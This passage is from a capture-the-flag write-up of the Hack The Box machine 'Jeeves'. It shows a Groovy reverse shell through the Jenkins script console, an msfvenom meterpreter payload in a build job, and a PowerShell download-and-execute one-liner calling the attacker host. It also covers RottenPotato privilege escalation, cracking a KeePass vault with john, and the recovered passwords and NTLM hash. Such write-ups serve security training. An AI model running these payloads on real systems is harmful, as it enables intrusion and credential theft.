class=&quot;o&quot;&gt;(!&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;isClosed&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;()){&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;while&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;pi&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;available&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;()&amp;gt;&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;so&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;pi&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;read&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;());&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;while&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;&lt;span 
class=&quot;n&quot;&gt;pe&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;available&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;()&amp;gt;&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;so&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;pe&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;read&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;());&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;while&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;si&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;available&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;()&amp;gt;&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;po&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;si&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;read&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;());&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;so&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;flush&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;();&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;po&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;flush&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;();&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;Thread&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;sleep&lt;/span&gt;&lt;span 
class=&quot;o&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;50&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;);&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;try&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;exitValue&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;();&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;break&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;;}&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;catch&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;Exception&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;e&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;){}};&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;destroy&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;();&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;close&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;();&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;Getting Reverse shell via Jenkins Script Console&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/jeeves# ncat -lnvp 8282
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::8282
Ncat: Listening on 0.0.0.0:8282
Ncat: Connection from 10.10.10.63.
Ncat: Connection from 10.10.10.63:49723.
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\.jenkins&amp;gt;whoami /all
whoami /all

USER INFORMATION
----------------

User Name      SID
============== ===========================================
jeeves\kohsuke S-1-5-21-2851396806-8246019-2289784878-1001


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes
==================================== ================ ============ ==================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account           Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

ERROR: Unable to get user claims information.
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;hr /&gt;

&lt;h4 id=&quot;method-2-build-job-exec-command&quot;&gt;Method 2: Build Job Exec Command&lt;/h4&gt;

&lt;p&gt;With Jenkins you can execute system commands as part of a deployment build job. This Jenkins server allowed anyone, even the anonymous user, to do anything, which means we can create a malicious deployment &amp;amp; execute our code.&lt;/p&gt;

&lt;p&gt;Steps:&lt;/p&gt;
&lt;ol&gt;
  &lt;li&gt;Create new Build Job (&lt;code class=&quot;highlighter-rouge&quot;&gt;http://10.10.10.63:50000/askjeeves/view/all/newJob&lt;/code&gt;)&lt;/li&gt;
  &lt;li&gt;Select “FreeStyle Project”&lt;/li&gt;
  &lt;li&gt;Hit Ok&lt;/li&gt;
  &lt;li&gt;Select “Build Environment”&lt;/li&gt;
  &lt;li&gt;Generate payload / put the code you want to execute as a build step&lt;/li&gt;
  &lt;li&gt;Hit Apply&lt;/li&gt;
  &lt;li&gt;Start Build&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;You can run any system commands you want in the pre-deployment step; I used an &lt;code class=&quot;highlighter-rouge&quot;&gt;msfvenom&lt;/code&gt; payload just to validate that it’s possible.&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;gp&quot;&gt;root@dastinia:~# &lt;/span&gt;msfvenom -p windows/meterpreter/reverse_http &lt;span class=&quot;nv&quot;&gt;LHOST&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;10.10.15.30 &lt;span class=&quot;nv&quot;&gt;LPORT&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;8081 -f psh-cmd &amp;gt; 8081.cmd
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 588 bytes
Final size of psh-cmd file: 7111 bytes
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;p&gt;&lt;img src=&quot;https://i.imgur.com/sbVHY7I.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Hit Save &amp;amp; Apply&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;msf exploit(multi/handler) &amp;gt; set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD =&amp;gt; windows/meterpreter/reverse_http
msf exploit(multi/handler) &amp;gt; set LPORT 8081
LPORT =&amp;gt; 8081
msf exploit(multi/handler) &amp;gt; exploit -j
[*] Exploit running as background job 2.

[*] Started HTTP reverse handler on http://10.10.15.30:8081
msf exploit(multi/handler) &amp;gt; jobs

Jobs
====

  Id  Name                    Payload                           Payload opts
  --  ----                    -------                           ------------
  1   Exploit: multi/handler  windows/meterpreter/reverse_tcp   tcp://10.10.15.30:8383
  2   Exploit: multi/handler  windows/meterpreter/reverse_http  http://10.10.15.30:8081

msf exploit(multi/handler) &amp;gt;
[*] http://10.10.15.30:8081 handling request from 10.10.10.63; (UUID: mwj6ua5f) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 2 opened (10.10.15.30:8081 -&amp;gt; 10.10.10.63:49761) at 2018-05-16 15:14:13 -0400
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;p&gt;The session may die rapidly, so you may want to make it automigrate, but I prefer the groovy script method since it’s easier. This just validates that you can do it this way if you choose.&lt;/p&gt;

&lt;h2 id=&quot;privilege-escalation&quot;&gt;Privilege Escalation&lt;/h2&gt;

&lt;p&gt;Let’s run the results of the &lt;code class=&quot;highlighter-rouge&quot;&gt;systeminfo&lt;/code&gt; command through GDSSecurity’s &lt;a href=&quot;https://github.com/GDSSecurity/Windows-Exploit-Suggester&quot;&gt;Windows Exploit Suggester&lt;/a&gt; and see if there are any potential exploits/LPEs we can use. This is usually one of the first steps I take when I land on a Windows box, because you can very quickly determine whether you have a path to escalate your privileges through an exploit or have to find another way.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;C:\Users\kohsuke\Desktop&amp;gt;systeminfo

Host Name:                 JEEVES
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.10586 N/A Build 10586
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00331-20304-47406-AA297
Original Install Date:     10/25/2017, 4:45:33 PM
System Boot Time:          5/16/2018, 2:45:50 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2100 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.0.B64.1704110547, 4/11/2017
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US &amp;amp; Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 873 MB
Virtual Memory: Max Size:  2,687 MB
Virtual Memory: Available: 1,293 MB
Virtual Memory: In Use:    1,394 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 10 Hotfix(s) Installed.
                           [01]: KB3150513
                           [02]: KB3161102
                           [03]: KB3172729
                           [04]: KB3173428
                           [05]: KB4021702
                           [06]: KB4022633
                           [07]: KB4033631
                           [08]: KB4035632
                           [09]: KB4051613
                           [10]: KB4041689
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.63
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;https://i.imgur.com/fu0dA0L.png&quot; alt=&quot;Windows Exploit Suggester Output&quot; title=&quot;Windows Exploit Suggester Results&quot; /&gt;&lt;/p&gt;

&lt;p&gt;It looks like this machine is vulnerable to a few LPE exploits, the big ones being &lt;a href=&quot;https://github.com/foxglovesec/RottenPotato&quot;&gt;MS16-075 (RottenPotato)&lt;/a&gt; &amp;amp; &lt;a href=&quot;https://www.rapid7.com/db/modules/exploit/windows/local/ms16_032_secondary_logon_handle_privesc&quot;&gt;MS16-032&lt;/a&gt;. From our &lt;code class=&quot;highlighter-rouge&quot;&gt;systeminfo&lt;/code&gt; output we can rule out &lt;code class=&quot;highlighter-rouge&quot;&gt;MS16-032&lt;/code&gt; because that particular exploit requires &lt;code class=&quot;highlighter-rouge&quot;&gt;two cpu(s)&lt;/code&gt;, and this machine has only &lt;code class=&quot;highlighter-rouge&quot;&gt;one cpu.&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;It looks like this machine is vulnerable to MS16-075 (which I would say is fairly reliable when available), and from our earlier &lt;code class=&quot;highlighter-rouge&quot;&gt;whoami /all&lt;/code&gt; output it seems we have everything in place to successfully execute this exploit (notably &lt;code class=&quot;highlighter-rouge&quot;&gt;SeImpersonatePrivilege&lt;/code&gt;, which is enabled).&lt;/p&gt;

&lt;h3 id=&quot;method-1-ms16-075-rottenpotato&quot;&gt;Method 1: MS16-075 “RottenPotato”&lt;/h3&gt;

&lt;p&gt;The steps to successfully exploit MS16-075 “rotten potato” (with meterpreter) are:&lt;/p&gt;
&lt;ol&gt;
  &lt;li&gt;Have a meterpreter shell&lt;/li&gt;
  &lt;li&gt;Upload the RottenPotato/potato exploit executable&lt;/li&gt;
  &lt;li&gt;Load incognito in the meterpreter session&lt;/li&gt;
  &lt;li&gt;Execute the rottenpotato executable&lt;/li&gt;
  &lt;li&gt;Impersonate the NT AUTHORITY\SYSTEM token&lt;/li&gt;
  &lt;li&gt;You are now SYSTEM.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;em&gt;PowerShell one-liner for downloading and executing the file (getting a meterpreter shell):&lt;/em&gt;&lt;/p&gt;

&lt;div class=&quot;language-powershell highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;powershell -exec bypass -c &lt;span class=&quot;s2&quot;&gt;&quot;(New-Object Net.WebClient).DownloadFile('http://10.10.15.30:9999/8383.exe','8383.exe')&quot;&lt;/span&gt;;&lt;span class=&quot;nb&quot;&gt;Start&lt;/span&gt;-Process &lt;span class=&quot;s1&quot;&gt;'8383.exe'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;On Jeeves Host&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;C:\Users\Administrator\.jenkins&amp;gt;cd %appdata%

C:\Users\kohsuke\AppData\Roaming&amp;gt;powershell -exec bypass -c &quot;(New-Object Net.WebClient).DownloadFile('http://10.10.15.30:9999/8383.exe','8383.exe')&quot;;Start-Process '8383.exe'

C:\Users\kohsuke\AppData\Roaming&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;p&gt;&lt;em&gt;Attack Box&lt;/em&gt;&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;msf &amp;gt;
[*] Sending stage (179779 bytes) to 10.10.10.63
[*] Meterpreter session 4 opened (10.10.15.30:8383 -&amp;gt; 10.10.10.63:49682) at 2018-05-16 17:07:54 -0400

msf &amp;gt;
msf &amp;gt; sessions

Active sessions
===============
  Id  Name  Type                    Information              Connection  
  --  ----  ----                     -----------              ----------  
  2         meterpreter x86/windows                           10.10.15.30:8081 -&amp;gt; 10.10.10.63:49761 (10.10.10.63)  
  4         meterpreter x86/windows  JEEVES\kohsuke @ JEEVES  10.10.15.30:8383 -&amp;gt; 10.10.10.63:49682 (10.10.10.63)

&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;Completing the required steps for the exploit&lt;/em&gt;&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;meterpreter &amp;gt; upload /opt/serve/windows/priv/rottenpotato.exe
[*] uploading  : /opt/serve/windows/priv/rottenpotato.exe -&amp;gt; rottenpotato.exe
[*] Uploaded 664.00 KiB of 664.00 KiB (100.0%): /opt/serve/windows/priv/rottenpotato.exe -&amp;gt; rottenpotato.exe
[*] uploaded   : /opt/serve/windows/priv/rottenpotato.exe -&amp;gt; rottenpotato.exe
meterpreter &amp;gt; getuid
Server username: JEEVES\kohsuke
meterpreter &amp;gt; getprivs

Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter &amp;gt; load incognito
Loading extension incognito...Success.
meterpreter &amp;gt; list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
JEEVES\kohsuke

Impersonation Tokens Available
========================================
No tokens available

meterpreter &amp;gt; execute -cH -f rottenpotato.exe
Process 3620 created.
Channel 2 created.
meterpreter &amp;gt; list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
JEEVES\kohsuke

Impersonation Tokens Available
========================================
NT AUTHORITY\SYSTEM

meterpreter &amp;gt; impersonate_token &quot;NT AUTHORITY\SYSTEM&quot;
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM

meterpreter &amp;gt; getuid
Server username: NT AUTHORITY\SYSTEM
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;h3 id=&quot;method-2-crack-keepass-database-to-pass-the-hash&quot;&gt;Method 2: Crack Keepass Database to Pass-the-hash&lt;/h3&gt;

&lt;p&gt;If you search through the user &lt;code class=&quot;highlighter-rouge&quot;&gt;kohsuke&lt;/code&gt;’s Documents directory you will discover a file called &lt;code class=&quot;highlighter-rouge&quot;&gt;CEH.kdbx&lt;/code&gt;. The &lt;code class=&quot;highlighter-rouge&quot;&gt;.kdbx&lt;/code&gt; file extension is associated with the &lt;a href=&quot;https://keepass.info/&quot;&gt;KeePass Password Safe&lt;/a&gt;. If we can crack the password on this vault file, we will likely find credentials, potentially for the local administrator account.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Downloading the Keepass Database file with meterpreter&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;meterpreter &amp;gt; cd Documents
meterpreter &amp;gt; dir
Listing: C:\Users\kohsuke\Documents
===================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  2846  fil   2017-09-18 13:43:17 -0400  CEH.kdbx
40777/rwxrwxrwx   0     dir   2017-11-03 22:50:40 -0400  My Music
40777/rwxrwxrwx   0     dir   2017-11-03 22:50:40 -0400  My Pictures
40777/rwxrwxrwx   0     dir   2017-11-03 22:50:40 -0400  My Videos
100666/rw-rw-rw-  402   fil   2017-11-03 23:15:51 -0400  desktop.ini

meterpreter &amp;gt; download CEH.kdbx
[*] Downloading: CEH.kdbx -&amp;gt; CEH.kdbx
[*] Downloaded 2.78 KiB of 2.78 KiB (100.0%): CEH.kdbx -&amp;gt; CEH.kdbx
[*] download   : CEH.kdbx -&amp;gt; CEH.kdbx
meterpreter &amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;p&gt;&lt;em&gt;Verifying the downloaded file&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/jeeves# file CEH.kdbx
CEH.kdbx: Keepass password database 2.x KDBX
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Before we can crack &lt;code class=&quot;highlighter-rouge&quot;&gt;CEH.kdbx&lt;/code&gt; we need to convert it to a format that either &lt;code class=&quot;highlighter-rouge&quot;&gt;john&lt;/code&gt; or &lt;code class=&quot;highlighter-rouge&quot;&gt;hashcat&lt;/code&gt; can understand. We can use the tool &lt;code class=&quot;highlighter-rouge&quot;&gt;keepass2john&lt;/code&gt; (preinstalled on Kali) to do this.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/jeeves# keepass2john CEH.kdbx
CEH:$keepass$*2*6000*222*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
root@dastinia:~/htb/jeeves# keepass2john CEH.kdbx &amp;gt; CEH.hash
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;Cracking the hash &amp;amp; getting the password of the vault with john&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/jeeves# john --wordlist=/usr/share/wordlists/rockyou.txt CEH.hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64 OpenSSL])
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1       (CEH)
1g 0:00:01:02 DONE (2018-05-16 23:54) 0.01601g/s 880.4p/s 880.4c/s 880.4C/s moonshine1
Use the &quot;--show&quot; option to display all of the cracked passwords reliably
Session completed
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
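&lt;p&gt;As an added example that is not part of the original write-up, the PowerShell below parses the &lt;code class=&quot;highlighter-rouge&quot;&gt;keepass2john&lt;/code&gt; line printed above and pulls out the setting a defender should look at first, the AES-KDF transform-round count (6000 for this vault), then uses the 880 c/s rate john reported above to estimate how long a leaked vault would hold up against a wordlist of a given size. The field order is my reading of john’s format for version-2 databases and the rockyou line count are assumptions; the sample line is the one printed on this page.&lt;/p&gt;

```powershell
# Added example, not code from the original write-up.
# Parses one keepass2john output line for a KDBX 2.x/3.x database and returns
# the pieces a defender should check. Field order (assumed from john's format):
#   $keepass$ * 2 * transformRounds * headerLength * masterSeed * transformSeed
#             * encryptionIV * expectedStartBytes * firstBlockHash
function ConvertFrom-Keepass2JohnLine {
    param([Parameter(Mandatory)][string]$Line)

    # keepass2john prefixes the line with the database name and a colon.
    $name, $hash = $Line -split ':', 2
    if (-not $hash.StartsWith('$keepass$*2*')) {
        throw "Not a version-2 keepass2john line: $Line"
    }
    $f = $hash.Split('*')
    if ($f.Count -ne 9) {
        throw "Expected 9 '*'-separated fields, found $($f.Count)"
    }
    # Hex field lengths: 32-byte seeds and hashes, a 16-byte IV.
    $expectedHexLength = @{ 4 = 64; 5 = 64; 6 = 32; 7 = 64; 8 = 64 }
    foreach ($i in $expectedHexLength.Keys) {
        if ($f[$i].Length -ne $expectedHexLength[$i] -or $f[$i] -notmatch '^[0-9a-f]+$') {
            throw "Field $i is not $($expectedHexLength[$i]) hex characters"
        }
    }
    [pscustomobject]@{
        Name               = $name
        TransformRounds    = [int64]$f[2]
        HeaderLength       = [int]$f[3]
        MasterSeed         = $f[4]
        TransformSeed      = $f[5]
        EncryptionIV       = $f[6]
        ExpectedStartBytes = $f[7]
        FirstBlockHash     = $f[8]
    }
}

# Risk estimate from the numbers on this page: john reported 880 candidates per
# second against 6000 rounds. AES-KDF cost is linear in the round count, so the
# rate for a different vault scales by (observedRounds / vaultRounds).
function Get-ExhaustTime {
    param(
        [Parameter(Mandatory)][int64]$VaultRounds,
        [int64]$CandidateCount = 14344391,   # assumed rockyou.txt line count
        [double]$ObservedRate = 880.4,       # c/s reported by john on this page
        [int64]$ObservedRounds = 6000
    )
    $rate = $ObservedRate * $ObservedRounds / $VaultRounds
    [pscustomobject]@{
        VaultRounds = $VaultRounds
        RatePerSec  = [math]::Round($rate, 1)
        Hours       = [math]::Round($CandidateCount / $rate / 3600, 1)
    }
}

# Constructed demo using the line keepass2john printed on this page.
$line = 'CEH:$keepass$*2*6000*222*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48'
$vault = ConvertFrom-Keepass2JohnLine -Line $line
$vault | Format-List Name, TransformRounds, HeaderLength

# Compare this vault's 6000 rounds with one configured for 6,000,000 rounds:
# the wordlist that falls in about 4.5 hours here would take about 4,500.
6000, 6000000 | ForEach-Object { Get-ExhaustTime -VaultRounds $_ } | Format-Table -AutoSize
```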

&lt;p&gt;We can then open the file with the KeePass utility using the password we recovered with JTR.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://i.imgur.com/RYZ8yPc.png&quot; alt=&quot;Opening KeePass Database File&quot; title=&quot;Opening KeePass Database with cracked password -'moonshine1'&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Here are the entries contained in the KeePass database file.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;Password
12345
F7WhTrSFDKB6sxHU1cUn
pwndyouall!
lCEUnYPjNfIuPZSzOySA
S1TjAtJHKsugh9oC4VZl
aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;We have a few passwords and a hash &lt;code class=&quot;highlighter-rouge&quot;&gt;aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00&lt;/code&gt;, which happens to be an &lt;code class=&quot;highlighter-rouge&quot;&gt;NTLM&lt;/code&gt; hash. The &lt;code class=&quot;highlighter-rouge&quot;&gt;SMB&lt;/code&gt; service (port 445) is exposed on this server, so we can attempt to authenticate to the system with a password spray attack or a pass-the-hash attack.&lt;/p&gt;

&lt;p&gt;I’m a pretty big fan of &lt;a href=&quot;https://github.com/byt3bl33d3r/CrackMapExec&quot;&gt;CrackMapExec&lt;/a&gt; as a tool, and I use it pretty frequently for my real life work as well.&lt;/p&gt;

&lt;p&gt;Some CME syntax: &lt;code class=&quot;highlighter-rouge&quot;&gt;-p&lt;/code&gt; is for a list of passwords, and &lt;code class=&quot;highlighter-rouge&quot;&gt;-H&lt;/code&gt; is for a list of hashes.&lt;/p&gt;

&lt;p&gt;I used the &lt;code class=&quot;highlighter-rouge&quot;&gt;--lusers&lt;/code&gt; flag to enumerate the logged on users just to validate that the credentials I used actually worked.&lt;/p&gt;

